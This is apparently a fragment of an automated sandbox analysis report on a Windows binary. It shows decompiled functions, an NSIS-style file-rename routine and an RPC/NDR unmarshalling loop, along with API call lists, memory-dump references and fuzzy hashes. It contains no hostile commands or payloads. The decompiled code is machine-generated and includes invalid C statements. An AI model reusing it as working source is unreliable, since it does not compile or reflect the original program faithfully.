                                                                                                									GlobalFree(_t51);
                                                                                                									goto L15;
                                                                                                								}
                                                                                                								_t37 = _t28 + 1;
                                                                                                								_t44 = _t51 + _t47;
                                                                                                								_t54 = _t37;
                                                                                                								if(_t37 >= _t44) {
                                                                                                									L21:
                                                                                                									_t53 =  *(_t56 + 0x14);
                                                                                                									_t29 = _t37 - _t51;
                                                                                                									goto L14;
                                                                                                								} else {
                                                                                                									goto L20;
                                                                                                								}
                                                                                                								do {
                                                                                                									L20:
                                                                                                									 *((char*)(_t43 + _t54)) =  *_t54;
                                                                                                									_t54 = _t54 + 1;
                                                                                                								} while (_t54 < _t44);
                                                                                                								goto L21;
                                                                                                							}
                                                                                                							E0040592B(_t51 + _t47, "[Rename]\r\n");
                                                                                                							_t47 = _t47 + 0xa;
                                                                                                							goto L13;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					CloseHandle(E00405602(_t49, 0, 1));
                                                                                                					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
                                                                                                					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                				return _t16;
                                                                                                			}






















                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004057ff
                                                                                                0x004057ff
                                                                                                0x00405802
                                                                                                0x00405805
                                                                                                0x00405806
                                                                                                0x00000000
                                                                                                0x004057ff
                                                                                                0x00405792
                                                                                                0x00405797
                                                                                                0x00000000
                                                                                                0x00405797
                                                                                                0x0040575e
                                                                                                0x004056bb
                                                                                                0x004056c6
                                                                                                0x004056cf
                                                                                                0x004056d3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004056d3
                                                                                                0x004057e0

                                                                                                APIs
                                                                                                  • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                  • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                  • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,0040540E,?,00000000,000000F1,?), ref: 004056C6
                                                                                                • GetShortPathNameA.KERNEL32(?,0042C168,00000400), ref: 004056CF
                                                                                                • GetShortPathNameA.KERNEL32(00000000,0042BBE0,00000400), ref: 004056EC
                                                                                                • wsprintfA.USER32 ref: 0040570A
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040576A
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004057C2
                                                                                                • GlobalFree.KERNEL32 ref: 004057C9
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004057D0
                                                                                                  • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                                                                                  • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                • String ID: %s=%s$[Rename]
                                                                                                • API String ID: 3772915668-1727408572
                                                                                                • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                                                                                • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                                                                                                • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                                                                                • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p$unhandled format %d
                                                                                                • API String ID: 4056999889-3276087146
                                                                                                • Opcode ID: 7b4a0965bcc19093ea8ae4677bec0b570856f6aae5612e503e99510260bd8bbe
                                                                                                • Instruction ID: e9b245f69b1332c98461de5335039f2d91d858c50603febdaca5236b23304386
                                                                                                • Opcode Fuzzy Hash: 7b4a0965bcc19093ea8ae4677bec0b570856f6aae5612e503e99510260bd8bbe
                                                                                                • Instruction Fuzzy Hash: 58D13BB5A00109AFCB04CF99E890EAA7BB5AF89314F04C519FE594F345E731EA51CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA96E7(void* __eflags) {
                                                                                                				void* _t220;
                                                                                                				void* _t222;
                                                                                                				void* _t224;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					E6EDAAFA0( *((intOrPtr*)(_t220 + 8)), _t220 - 0x28, 4);
                                                                                                					 *( *(_t220 + 0xc)) =  *(_t220 - 0x28);
                                                                                                					0x6eda0000("uint3264=%ld => %p\n",  *( *(_t220 + 0xc)),  *(_t220 + 0xc));
                                                                                                					_t224 = _t222 + 0x18;
                                                                                                					 *(_t220 + 0xc) =  &(( *(_t220 + 0xc))[2]);
                                                                                                					while(1) {
                                                                                                						L47:
                                                                                                						 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                						L1:
                                                                                                						while(( *( *(_t220 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                                							 *(_t220 - 0xc) =  *( *(_t220 + 0x10)) & 0x000000ff;
                                                                                                							 *(_t220 - 0xc) =  *(_t220 - 0xc) - 1;
                                                                                                							if( *(_t220 - 0xc) > 0xb8) {
                                                                                                								L46:
                                                                                                								0x6eda0000("unhandled format %d\n",  *( *(_t220 + 0x10)) & 0x000000ff);
                                                                                                								_t224 = _t224 + 8;
                                                                                                								while(1) {
                                                                                                									L47:
                                                                                                									 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								}
                                                                                                							}
                                                                                                							L3:
                                                                                                							_t16 =  *(_t220 - 0xc) + 0x6eda9b24; // 0xcccccc0f
                                                                                                							switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
                                                                                                								case 0:
                                                                                                									L4:
                                                                                                									E6EDAAFA0( *((intOrPtr*)(_t220 + 8)),  *(_t220 + 0xc), 1);
                                                                                                									_push( *(_t220 + 0xc));
                                                                                                									_push( *( *(_t220 + 0xc)) & 0x0000ffff);
                                                                                                									_push("byte=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									_t224 = _t224 + 0x18;
                                                                                                									 *(_t220 + 0xc) =  &(( *(_t220 + 0xc))[0]);
                                                                                                									L47:
                                                                                                									 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								case 1:
                                                                                                									L5:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                                									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                                									_push("short=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 2;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 2:
                                                                                                									L9:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("long=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 3:
                                                                                                									L11:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									asm("cvtss2sd xmm0, [eax]");
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("float=%f => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 4:
                                                                                                									L12:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__edx + 4);
                                                                                                									_push(__eax);
                                                                                                									__ecx =  *__edx;
                                                                                                									_push(__ecx);
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									_push(__eax);
                                                                                                									_push("longlong=%s => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 5:
                                                                                                									L13:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd xmm0, [eax]");
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("double=%f => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 6:
                                                                                                									L6:
                                                                                                									__edx = __ebp - 4;
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
                                                                                                									__ecx =  *(__ebp - 4) & 0x0000ffff;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("enum16=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                                										_push(0x6f5);
                                                                                                										__imp__RpcRaiseException();
                                                                                                									}
                                                                                                									L8:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 7:
                                                                                                									L14:
                                                                                                									 *(__ebp - 0x1c) = 0;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									_push("pointer => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                										__edx =  *(__ebp + 0x10);
                                                                                                										 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 0x14);
                                                                                                									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                									if(__ecx != 0x11) {
                                                                                                										 *(__ebp + 8) =  *(__ebp + 8) + 4;
                                                                                                										__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__eax + 4);
                                                                                                									 *(__ebp - 0x20) =  *(__eax + 4);
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                                										__ecx =  *(__ebp + 0x14);
                                                                                                										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                									} else {
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 0x34);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										 *( *(__ebp + 8) + 0x34) = 0;
                                                                                                										 *(__ebp - 0x1c) = 1;
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                									__edx =  *(__ebp + 0x14);
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__ebp - 0x20);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
                                                                                                									if( *(__ebp - 0x1c) == 0) {
                                                                                                										L28:
                                                                                                										__edx =  *(__ebp + 0x10);
                                                                                                										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                											__edx =  *(__ebp + 0x10);
                                                                                                											__edx =  *(__ebp + 0x10) + 4;
                                                                                                											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                                										} else {
                                                                                                											__ecx =  *(__ebp + 0x14);
                                                                                                											__ecx =  *(__ebp + 0x14) + 4;
                                                                                                											 *(__ebp + 0x14) = __ecx;
                                                                                                										}
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										while(1) {
                                                                                                											L47:
                                                                                                											 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                											goto L1;
                                                                                                										}
                                                                                                									} else {
                                                                                                										do {
                                                                                                											L23:
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *(__edx + 0x14);
                                                                                                											_push( *(__edx + 0x14));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__edx =  *( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                                											_push( *(__eax + 4) -  *(__edx + 8));
                                                                                                											_push("buffer=%d/%d\n");
                                                                                                											0x6eda0000();
                                                                                                											__esp = __esp + 0xc;
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *( *(__ebp + 8));
                                                                                                											__ecx =  *(__eax + 8);
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__edx =  *( *(__ebp + 8));
                                                                                                												__eax =  *(__edx + 8);
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                												__edx =  *(__ebp + 8);
                                                                                                												__ecx =  *(__edx + 4);
                                                                                                												__ecx =  *(__edx + 4) - __eax;
                                                                                                												_push( *(__edx + 4) - __eax);
                                                                                                												_push("buffer overflow %d bytes\n");
                                                                                                												0x6eda0000();
                                                                                                												__esp = __esp + 8;
                                                                                                											}
                                                                                                											__edx = 0;
                                                                                                										} while (0 != 0);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 4);
                                                                                                										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp - 0x20);
                                                                                                										 *( *(__ebp + 8) + 4) = __ecx;
                                                                                                										__edx =  *(__ebp + 0x14);
                                                                                                										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                										goto L28;
                                                                                                									}
                                                                                                								case 8:
                                                                                                									L32:
                                                                                                									__ecx =  *(__ebp - 0x10);
                                                                                                									__edx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 9:
                                                                                                									L33:
                                                                                                									__eax =  *(__ebp - 0x10);
                                                                                                									__ecx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xa:
                                                                                                									L34:
                                                                                                									__edx =  *(__ebp - 0x10);
                                                                                                									__ebp + 0xc = E6EDA7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xb:
                                                                                                									L35:
                                                                                                									__ecx =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                									 *(__ebp + 0xc) = E6EDB0770( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
                                                                                                									__ecx =  *(__ebp + 0x10);
                                                                                                									__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xc:
                                                                                                									L36:
                                                                                                									1 = 1 << 0;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									__edx =  *(__ebp - 8);
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									 *(__ebp - 0x18) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp - 0x18);
                                                                                                									_push( *(__ebp - 0x18));
                                                                                                									_push("embedded complex (size=%d) => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
                                                                                                										__ecx =  *(__ebp - 0x18);
                                                                                                										__edx =  *(__ebp + 0xc);
                                                                                                										__eax = E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
                                                                                                									}
                                                                                                									__eax =  *(__ebp - 8);
                                                                                                									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                									__ecx =  *( *(__ebp - 8)) & 0x7f;
                                                                                                									__edx =  *(0x6edbb418 + __ecx * 4);
                                                                                                									 *(__ebp - 0x14) =  *(0x6edbb418 + __ecx * 4);
                                                                                                									if( *(__ebp - 0x14) == 0) {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										_push( *( *(__ebp - 8)) & 0x000000ff);
                                                                                                										_push("no unmarshaller for embedded type %02x\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                									} else {
                                                                                                										__eax =  *(__ebp - 8);
                                                                                                										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
                                                                                                											_push(0);
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax = __ebp + 0xc;
                                                                                                											_push(__ebp + 0xc);
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										} else {
                                                                                                											_push(0);
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax =  *(__ebp + 0xc);
                                                                                                											_push( *(__ebp + 0xc));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										}
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									goto L1;
                                                                                                								case 0xd:
                                                                                                									L45:
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xe:
                                                                                                									L10:
                                                                                                									__edx = __ebp - 0x24;
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 0x24, 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *(__ebp - 0x24);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *__ecx;
                                                                                                									_push( *__ecx);
                                                                                                									_push("int3264=%ld => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xf:
                                                                                                									goto L0;
                                                                                                								case 0x10:
                                                                                                									goto L46;
                                                                                                							}
                                                                                                						}
                                                                                                						return  *(_t220 + 0xc);
                                                                                                					}
                                                                                                				}
                                                                                                			}






                                                                                                0x6eda995a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a9
                                                                                                0x6eda98ac
                                                                                                0x6eda98ad
                                                                                                0x6eda98b0
                                                                                                0x6eda98b2
                                                                                                0x6eda98b8
                                                                                                0x6eda98bb
                                                                                                0x6eda98bc
                                                                                                0x6eda98c1
                                                                                                0x6eda98c6
                                                                                                0x6eda98c9
                                                                                                0x6eda98cc
                                                                                                0x6eda98ce
                                                                                                0x6eda98d1
                                                                                                0x6eda98d4
                                                                                                0x6eda98d7
                                                                                                0x6eda98dd
                                                                                                0x6eda98df
                                                                                                0x6eda98e2
                                                                                                0x6eda98e4
                                                                                                0x6eda98e7
                                                                                                0x6eda98ea
                                                                                                0x6eda98ed
                                                                                                0x6eda98f0
                                                                                                0x6eda98f3
